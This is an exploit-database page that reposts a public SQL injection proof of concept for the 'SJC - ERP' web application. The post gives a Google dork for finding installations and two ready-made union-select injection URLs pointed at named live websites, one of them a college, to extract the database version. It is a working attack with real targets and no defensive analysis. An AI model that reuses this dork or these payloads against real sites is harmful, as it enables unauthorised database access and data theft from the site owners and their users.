Advertisement






SJC - ERP - Sql Injection

CVE Category Price Severity
CVE-XXXX-XXXX CWE-89 $500 High
Author Risk Exploitation Type Date
Unknown High Remote 2023-12-26
CVSS
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:N

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2023120049

Below is a copy:

SJC - ERP - Sql Injection
*********************************************************
#Exploit Title: SJC - ERP - Sql Injection
#Date: 2023-12-25
#Exploit Author: Behrouz Mansoori
#Google Dork: "Designed & Development by SJC - ERP."
#Category:webapps
#Tested On: Mac, Firefox
Proof of Concept:
### Demo :
http://www.serviteascw.com/page.php?Mid=2&id=-27%20union%20select%201,2,3,4,5,version(),7,8,9--
https://sacw.edu.in/page.php?Mid=1&id=-18%20union%20select%201,2,3,4,5,version(),7,8,9--
*********************************************************
#Discovered by: Behrouz mansoori
#Instagram: Behrouz_mansoori
#Email: [email protected]
*********************************************************

Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.